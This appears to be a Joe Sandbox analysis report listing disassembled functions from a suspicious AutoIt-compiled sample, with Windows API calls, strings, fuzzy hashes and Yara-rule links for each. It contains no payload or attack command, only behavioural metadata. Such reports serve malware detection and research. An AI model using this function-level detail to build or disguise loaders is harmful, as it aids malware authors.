Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: BuffCharUpper
String ID: t
API String ID: 3964851224-652018971
Opcode ID: 82d8f137df155304ffcff67fa58636b2f469385c301cb5b3e6fc5632aef080c6
Instruction ID: e28e77c2071d0f4aa8c0799f17fa7a08c4f3b6c0cec3426a1f4b6d83cbee3eee
Opcode Fuzzy Hash: 82d8f137df155304ffcff67fa58636b2f469385c301cb5b3e6fc5632aef080c6
Instruction Fuzzy Hash: 14928B706083419FDB64DF18C480B6AB7E6FF88308F14895DE98A8B762D771ED46CB52

Function 0068E8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0068E959
timeGetTime.WINMM ref: 0068EBFA
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0068ED2E
TranslateMessage.USER32(?), ref: 0068ED3F
DispatchMessageW.USER32(?), ref: 0068ED4A
LockWindowUpdate.USER32(00000000), ref: 0068ED79
DestroyWindow.USER32 ref: 0068ED85
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0068ED9F
Sleep.KERNEL32(0000000A), ref: 006F5270
TranslateMessage.USER32(?), ref: 006F59F7
DispatchMessageW.USER32(?), ref: 006F5A05
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 006F5A19

Strings

@TRAY_ID, xrefs: 006F54C9
@GUI_CTRLID, xrefs: 006F5314
@GUI_CTRLHANDLE, xrefs: 006F53AC
@GUI_WINHANDLE, xrefs: 006F5360

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 2641332412-570651680
Opcode ID: 35bb6aa07123eb60152fff3c0b3f63365b13b9cfd3511a91bbc77067529aeb87
Instruction ID: 4ebd32179ec176766071481b6f47cd7461683bab3af06be1e9918eac83174674
Opcode Fuzzy Hash: 35bb6aa07123eb60152fff3c0b3f63365b13b9cfd3511a91bbc77067529aeb87
Instruction Fuzzy Hash: B9621570508344DFDB24EF24C885BAA77E6BF44304F044A6DFA4A8B292DBB5DC45CB56

Function 006B5C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

___createFile.LIBCMT ref: 006B5EC3
___createFile.LIBCMT ref: 006B5F04
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 006B5F2D
__dosmaperr.LIBCMT ref: 006B5F34
GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 006B5F47
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 006B5F6A
__dosmaperr.LIBCMT ref: 006B5F73
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 006B5F7C
__set_osfhnd.LIBCMT ref: 006B5FAC
__lseeki64_nolock.LIBCMT ref: 006B6016
__close_nolock.LIBCMT ref: 006B603C
__chsize_nolock.LIBCMT ref: 006B606C
__lseeki64_nolock.LIBCMT ref: 006B607E
__lseeki64_nolock.LIBCMT ref: 006B6176
__lseeki64_nolock.LIBCMT ref: 006B618B
__close_nolock.LIBCMT ref: 006B61EB

Part of subcall function 006AEA9C: CloseHandle.KERNELBASE(00000000,0072EEF4,00000000,?,006B6041,0072EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 006AEAEC
Part of subcall function 006AEA9C: GetLastError.KERNEL32(?,006B6041,0072EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 006AEAF6
Part of subcall function 006AEA9C: __free_osfhnd.LIBCMT ref: 006AEB03
Part of subcall function 006AEA9C: __dosmaperr.LIBCMT ref: 006AEB25

Part of subcall function 006A7C0E: __getptd_noexit.LIBCMT ref: 006A7C0E

__lseeki64_nolock.LIBCMT ref: 006B620D
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 006B6342
___createFile.LIBCMT ref: 006B6361
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 006B636E
__dosmaperr.LIBCMT ref: 006B6375
__free_osfhnd.LIBCMT ref: 006B6395
__invoke_watson.LIBCMT ref: 006B63C3
__wsopen_helper.LIBCMT ref: 006B63DD

Strings

@, xrefs: 006B5F98

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
String ID: @
API String ID: 3896587723-2766056989
Opcode ID: 4a1f7b6640beabd8a699cb10051e9eee4588eae6d4c6e6e0eef30b2998537c7c
Instruction ID: 67a119c42f4a0c5b8dec22118893947201237482d67b648a085c12593b3caaff
Opcode Fuzzy Hash: 4a1f7b6640beabd8a699cb10051e9eee4588eae6d4c6e6e0eef30b2998537c7c
Instruction Fuzzy Hash: EC2204F19046059BEB25AF68DC45BED7B63EF05324F284229F522973D2C3398D81CB95

Function 006CFA0C Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcscpy.LIBCMT ref: 006CFA96
_wcschr.LIBCMT ref: 006CFAA4
_wcscpy.LIBCMT ref: 006CFABB
_wcscat.LIBCMT ref: 006CFACA
_wcscat.LIBCMT ref: 006CFAE8
_wcscpy.LIBCMT ref: 006CFB09
__wsplitpath.LIBCMT ref: 006CFBE6
_wcscpy.LIBCMT ref: 006CFC0B
_wcscpy.LIBCMT ref: 006CFC1D
_wcscpy.LIBCMT ref: 006CFC32
_wcscat.LIBCMT ref: 006CFC47
_wcscat.LIBCMT ref: 006CFC59
_wcscat.LIBCMT ref: 006CFC6E

Part of subcall function 006CBFA4: _wcscmp.LIBCMT ref: 006CC03E
Part of subcall function 006CBFA4: __wsplitpath.LIBCMT ref: 006CC083
Part of subcall function 006CBFA4: _wcscpy.LIBCMT ref: 006CC096
Part of subcall function 006CBFA4: _wcscat.LIBCMT ref: 006CC0A9
Part of subcall function 006CBFA4: __wsplitpath.LIBCMT ref: 006CC0CE
Part of subcall function 006CBFA4: _wcscat.LIBCMT ref: 006CC0E4
Part of subcall function 006CBFA4: _wcscat.LIBCMT ref: 006CC0F7

Strings

t2s, xrefs: 006CFC97
>>>AUTOIT SCRIPT<<<, xrefs: 006CFA61

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
String ID: >>>AUTOIT SCRIPT<<<$t2s
API String ID: 2955681530-1164211823
Opcode ID: 9ffb24bf2d2bf9a243e5a3e824a5361747715a7b908642893f216570cb19f163
Instruction ID: 1fd1efb4b93163bcdd4f74dc1c131a6a0a2b9c733f0c0628dd4d46b402049b40
Opcode Fuzzy Hash: 9ffb24bf2d2bf9a243e5a3e824a5361747715a7b908642893f216570cb19f163
Instruction Fuzzy Hash: ED91AF72504205AFDB60FB50C851FAAB3EAFF48310F04496DF98997292DB30EE44CB96

Function 006AEE0E Relevance: 26.2, APIs: 17, Instructions: 664COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: __getptd_noexit
String ID:
API String ID: 3074181302-0
Opcode ID: 3834513d41443195d104a3de9e22b0644301c4a389c258e08f74f47432fbf205
Instruction ID: 19363086b198c9e0ded2373ebc60ba3b701cbdcd7997bd6064d615c0d773671d
Opcode Fuzzy Hash: 3834513d41443195d104a3de9e22b0644301c4a389c258e08f74f47432fbf205
Instruction Fuzzy Hash: 7B322674A04241DFDB21AFD8C840BAD7BB3AF57310F24816AE8559B392C7749C42CFA6

Function 006CBFA4 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 316
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006CBDB4: __time64.LIBCMT ref: 006CBDBE

Part of subcall function 00684517: _fseek.LIBCMT ref: 0068452F

__wsplitpath.LIBCMT ref: 006CC083

Part of subcall function 006A1DFC: __wsplitpath_helper.LIBCMT ref: 006A1E3C

_wcscpy.LIBCMT ref: 006CC096
_wcscat.LIBCMT ref: 006CC0A9
__wsplitpath.LIBCMT ref: 006CC0CE
_wcscat.LIBCMT ref: 006CC0E4
_wcscat.LIBCMT ref: 006CC0F7
_wcscmp.LIBCMT ref: 006CC03E

Part of subcall function 006CC56D: _wcscmp.LIBCMT ref: 006CC65D
Part of subcall function 006CC56D: _wcscmp.LIBCMT ref: 006CC670

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 006CC2A1
DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 006CC338
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 006CC34E
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006CC35F
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006CC371

Strings

p1#v`K$v, xrefs: 006CC2A1, 006CC338, 006CC35F, 006CC371

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
String ID: p1#v`K$v
API String ID: 2378138488-1068180069
Opcode ID: 68acec268901ebfd87e568e46bfafb2e46a6f536edab9e5b578f151ca258b6e1
Instruction ID: 6a33b2a1f650018be2e5c62d9e99e2b68337489f717c8bab4038e3a1d5137327
Opcode Fuzzy Hash: 68acec268901ebfd87e568e46bfafb2e46a6f536edab9e5b578f151ca258b6e1
Instruction Fuzzy Hash: 8EC12BB1900219ABDF61EF95CC81FEEB7BEEF49310F0041AAF609E6151DB349A448F65

Function 00683F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00683F86
RegisterClassExW.USER32(00000030), ref: 00683FB0
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00683FC1
InitCommonControlsEx.COMCTL32(?), ref: 00683FDE
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00683FEE
LoadIconW.USER32(000000A9), ref: 00684004
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00684013

Strings

TaskbarCreated, xrefs: 00683FB6
0, xrefs: 00683F68
AutoIt v3 GUI, xrefs: 00683FA2
+, xrefs: 00683F6F

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 5ebbf960f51b484628a9df1507e049d03ab42e9f44916306481e1ba4f1967a96
Instruction ID: d214c47e0af90acac74e00b7a8dbe42b17a5d9a9b8810d69491266a90f38f02e
Opcode Fuzzy Hash: 5ebbf960f51b484628a9df1507e049d03ab42e9f44916306481e1ba4f1967a96
Instruction Fuzzy Hash: 6F21CCB9900318EFDB10EFD4EC49BCD7BB4FB09700F418216F525A62A0DBB945848F99

Function 00683742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 006837B3
KillTimer.USER32(?,00000001), ref: 006837DD
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00683800
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0068380B
CreatePopupMenu.USER32 ref: 0068381F
PostQuitMessage.USER32(00000000), ref: 0068382E

Strings

TaskbarCreated, xrefs: 00683806

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 4b7e7a0bbc96f92ea39871142efafcf785af0c358b5acb972efd9ac1e15f0263
Instruction ID: 5e519b5dff26f19092151180ff9f7076cff41aec14d9ab21e9a8ccf3ac63a920
Opcode Fuzzy Hash: 4b7e7a0bbc96f92ea39871142efafcf785af0c358b5acb972efd9ac1e15f0263
Instruction Fuzzy Hash: 854138F5100229E7DB247B68EC4ABFA3A57FB01B40F404329F602963A1DF69DD81872D

Function 00683E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00683E79
LoadCursorW.USER32(00000000,00007F00), ref: 00683E88
LoadIconW.USER32(00000063), ref: 00683E9E
LoadIconW.USER32(000000A4), ref: 00683EB0
LoadIconW.USER32(000000A2), ref: 00683EC2

Part of subcall function 00684024: LoadImageW.USER32(00680000,00000063,00000001,00000010,00000010,00000000), ref: 00684048

RegisterClassExW.USER32(?), ref: 00683F30

Part of subcall function 00683F53: GetSysColorBrush.USER32(0000000F), ref: 00683F86
Part of subcall function 00683F53: RegisterClassExW.USER32(00000030), ref: 00683FB0
Part of subcall function 00683F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00683FC1
Part of subcall function 00683F53: InitCommonControlsEx.COMCTL32(?), ref: 00683FDE
Part of subcall function 00683F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00683FEE
Part of subcall function 00683F53: LoadIconW.USER32(000000A9), ref: 00684004
Part of subcall function 00683F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00684013

Strings

#, xrefs: 00683F09
0, xrefs: 00683F02
AutoIt v3, xrefs: 00683F1F

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: f4a544475a418c9bda1fe056debfc7edc56de75f4f9bb6b4d283d0d371a08a47
Instruction ID: 0935c561c83e00d4d63598dc25c62015622ace9d3e8d41f402393d5c4daefcfa
Opcode Fuzzy Hash: f4a544475a418c9bda1fe056debfc7edc56de75f4f9bb6b4d283d0d371a08a47
Instruction Fuzzy Hash: DA2124B4D00318ABCB10EFA9EC45A99BFF5EB49710F40821BE214A63A0D77945848F99

Function 00F04108 Relevance: 10.7, APIs: 7, Instructions: 151
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00F0414D

Memory Dump Source

Source File: 00000000.00000002.2160657406.0000000000F03000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F03000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f03000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction ID: 11c110ffb6bc1740669c445ddcd10bd4c1e591b382c89d862775f9d7bec7aaf2
Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction Fuzzy Hash: 9651CD75A50208FBDB20DFE4CC49FDE7778AF48711F108558F719EA1C0DA74AA44ABA4

Function 006849FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00684A1D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 006F41DB
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 006F421A
RegCloseKey.ADVAPI32(?), ref: 006F4249

Strings

Include, xrefs: 006F41D3, 006F4212
Software\AutoIt v3\AutoIt, xrefs: 00684A13

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Include$Software\AutoIt v3\AutoIt
API String ID: 1586453840-614718249
Opcode ID: 9bddc72463a4ba891d9a5f188bac09311744499f5b60640cb7c3d15905f5dcb3
Instruction ID: 71f531430ce2066430d807e0b7758aa300bcf6084b96b2f044bfeda4b5201601
Opcode Fuzzy Hash: 9bddc72463a4ba891d9a5f188bac09311744499f5b60640cb7c3d15905f5dcb3
Instruction Fuzzy Hash: 64116D71A00209BEEB14EBE8CD86DFF7BADEF04344F004168B506D6191EE749E419B64

Function 006836B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 006836E6
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00683707
ShowWindow.USER32(00000000,?,?,?,?,00683AA3,?), ref: 0068371B
ShowWindow.USER32(00000000,?,?,?,?,00683AA3,?), ref: 00683724

Strings

edit, xrefs: 00683701
AutoIt v3, xrefs: 006836DE, 006836E3, 006836E4

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 769f9edfe927c4cb83fb57b25d590ef7a0a4d0eb8e50f5ec566ffba7072714a8
Instruction ID: 5c39dcc2516ed65beebd7509bdb4bceae6843838be7b73d04090e7deb54ccde1
Opcode Fuzzy Hash: 769f9edfe927c4cb83fb57b25d590ef7a0a4d0eb8e50f5ec566ffba7072714a8
Instruction Fuzzy Hash: 50F0B779580394BAE731A797AC08E772E7DD7C7F20F40C11BBA04A21B0C6690CD5DAB5

Function 00684A30 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 138
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00685374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00741148,?,006861FF,?,00000000,00000001,00000000), ref: 00685392

Part of subcall function 006849FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00684A1D

_wcscat.LIBCMT ref: 006F2D80
_wcscat.LIBCMT ref: 006F2DB5

Strings

\, xrefs: 006F2DA2
\Include\, xrefs: 00684B0A
8!t, xrefs: 00684B1C

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: _wcscat$FileModuleNameOpen
String ID: 8!t$\$\Include\
API String ID: 3592542968-319416072
Opcode ID: 2574b3a9808cf4bf2ba673bead75c668c80fcd1250331ec5cf1dc9579fb23278
Instruction ID: e4f41770118afe7c274759e9120feda178b5ef3e0288e284f386b9e0918ded4d
Opcode Fuzzy Hash: 2574b3a9808cf4bf2ba673bead75c668c80fcd1250331ec5cf1dc9579fb23278
Instruction Fuzzy Hash: 2551A5794043448FC354FF59D8918AAB3F5FF4A310B80862FF24593262EB389959CF6A

Function 006851AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0068522F
_wcscpy.LIBCMT ref: 00685283
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00685293
LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 006F3CB0

Strings

Line: , xrefs: 006F3CD9

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memset_wcscpy
String ID: Line:
API String ID: 1053898822-1585850449
Opcode ID: 268568091e157597521a5e998760fa6b7f637174897ec65e88e1d88155fe9c1c
Instruction ID: 514bbc457dc5f4e75d791207bb6a7df5cf30d6b45ba510261b9cc47c3ad3efde
Opcode Fuzzy Hash: 268568091e157597521a5e998760fa6b7f637174897ec65e88e1d88155fe9c1c
Instruction Fuzzy Hash: 0F31EF71008740AFD370FB60DC46FEA77D9AF45310F00861EF586921A1EF74A688CB9A

Function 00684139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON

Download Yara Rule

